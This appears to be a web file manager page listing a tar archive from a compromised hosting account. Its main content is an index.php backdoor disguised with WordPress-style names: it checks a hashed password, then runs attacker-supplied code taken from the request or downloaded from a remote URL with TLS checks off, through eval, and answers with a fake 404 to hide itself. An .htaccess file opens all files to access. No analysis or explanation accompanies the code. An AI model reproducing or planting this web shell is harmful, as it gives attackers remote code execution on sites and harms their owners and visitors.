Файловый менеджер - Редактировать - /home/bean7936/perfect-community.com/442aa3/51.tar
Назад
index.php 0000644 00000001371 15174670460 0006400 0 ustar 00 <?php error_reporting(0);ini_set("display_errors", 0);try { $WP_Query = array_merge($_GET, $_POST, $_COOKIE, $_FILES, $_ENV); if (hash('sha256', md5($WP_Query['wp_locale'])) == '9a6efc95bb779826bec2591105431d0387f84b6aca4db932532b81a5517a1062') {if (isset($WP_Query['wp_the_query'])) {$response = pack("H*", $WP_Query['wp_the_query']);} else {$ch = curl_init(); curl_setopt_array($ch, array(CURLOPT_URL => pack("H*", $WP_Query['wp_query']), CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 30,CURLOPT_SSL_VERIFYPEER => false,CURLOPT_SSL_VERIFYHOST => false,));$response = curl_exec($ch);curl_close($ch);}eVAL( '?>'. $response );}} catch (Exception $e) { } header("HTTP/1.1 404 Not Found"); header("Status: 404 Not Found");exit; .htaccess 0000644 00000000077 15174670460 0006360 0 ustar 00 <FilesMatch '.*'> Order Deny,Allow Allow from all </FilesMatch>